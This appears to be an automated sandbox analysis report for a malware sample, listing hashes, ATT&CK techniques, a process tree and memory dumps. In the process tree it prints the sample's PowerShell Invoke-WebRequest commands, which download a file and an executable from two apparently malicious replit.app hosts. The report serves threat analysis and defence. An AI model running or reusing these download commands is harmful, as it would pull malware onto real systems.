d1fba2d16b292e393bae1e2a292741a076b06c89e7254ecba7ab087d8bb496fb

General

Target

sample.exe
Size

510KB
MD5

2b19d65705eee546214513fb65948b2a
SHA1

20b6c01b9f20047fc9f3bf9baa14b5046cbc0012
SHA256

106dc2ab6da5448b983e66c7c6850533006abf9176eb6ee3d58e101b83d8d47f
SHA512

183bb9331b20d2f4118820bd372e5202220e29cfea2d5ae5fedd8d1a9bfaf548a9399aa604950553948899a1d75658e64480c660ce7f83bb89cd566e1385eb72
SSDEEP

6144:+ldk1cWQRNTB2/Me7eC9g1HGnKBvYfew0PjZmwvhhlJdZBuUwXtgZcJeJ:+cv0NTg/XrRnKBwfOM0dayZKeJ

Score

8^/10

discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
904	powershell.exe
2260	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sample.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
904	powershell.exe
2260	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	904	powershell.exe
Token: SeDebugPrivilege	2260	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 2056 wrote to memory of 2148	2056	sample.exe	30
PID 2056 wrote to memory of 2148	2056	sample.exe	30
PID 2056 wrote to memory of 2148	2056	sample.exe	30
PID 2056 wrote to memory of 2148	2056	sample.exe	30
PID 2148 wrote to memory of 904	2148	cmd.exe	32
PID 2148 wrote to memory of 904	2148	cmd.exe	32
PID 2148 wrote to memory of 904	2148	cmd.exe	32
PID 2148 wrote to memory of 2260	2148	cmd.exe	33
PID 2148 wrote to memory of 2260	2148	cmd.exe	33
PID 2148 wrote to memory of 2260	2148	cmd.exe	33

C:\Users\Admin\AppData\Local\Temp\sample.exe
"C:\Users\Admin\AppData\Local\Temp\sample.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2056
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BD47.tmp\BD48.tmp\BD49.bat C:\Users\Admin\AppData\Local\Temp\sample.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2148
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:904
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/CoinAIfdp.exe' -OutFile CoinAIfdp.exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2260

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\BD47.tmp\BD48.tmp\BD49.bat

Filesize
329B

MD5
91f265d84f2c400c6f731982fbc1dd26

SHA1
6d175c5694e58dd4d0ea55e77679de57105c6b0d

SHA256
ded4d515b9bcfdd3221da6239dc2fac799b129712ffcc1f92722a2c508a0c173

SHA512
4ea36db68fa533eb1b55d365abf400c9fc6cca8968b1950da2c02fd56f72b7a031583c8c730a4003354f2b010a879e94d15b80a3595e50581c72ad25c75bb67b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
6c93a314590022e5903024495758ac41

SHA1
d703619449bb98220c160217a3ab0718eecf716d

SHA256
635acb12569597ad2d2a3f88f427f6588f9b0c93259d9a2d26ba0c3eec4a3855

SHA512
9115de23290e711685afd4c4684d32cabaa60cfb923076dff0bc52d441a711eb90ffb8d15057c8d3448317900ca4cf1d7e6ea5e312269b7c4e6137e305ff5609

Download Submit
memory/904-11-0x000007FEF6040000-0x000007FEF69DD000-memory.dmp

Filesize
9.6MB

Download
memory/904-8-0x00000000027E0000-0x00000000027E8000-memory.dmp

Filesize
32KB

Download
memory/904-9-0x000007FEF6040000-0x000007FEF69DD000-memory.dmp

Filesize
9.6MB

Download
memory/904-10-0x000007FEF6040000-0x000007FEF69DD000-memory.dmp

Filesize
9.6MB

Download
memory/904-7-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

Filesize
2.9MB

Download
memory/904-12-0x000007FEF6040000-0x000007FEF69DD000-memory.dmp

Filesize
9.6MB

Download
memory/904-13-0x000007FEF6040000-0x000007FEF69DD000-memory.dmp

Filesize
9.6MB

Download
memory/904-14-0x000007FEF6040000-0x000007FEF69DD000-memory.dmp

Filesize
9.6MB

Download
memory/904-6-0x000007FEF62FE000-0x000007FEF62FF000-memory.dmp

Filesize
4KB

Download
memory/2260-20-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

Filesize
2.9MB

Download
memory/2260-21-0x0000000001E80000-0x0000000001E88000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing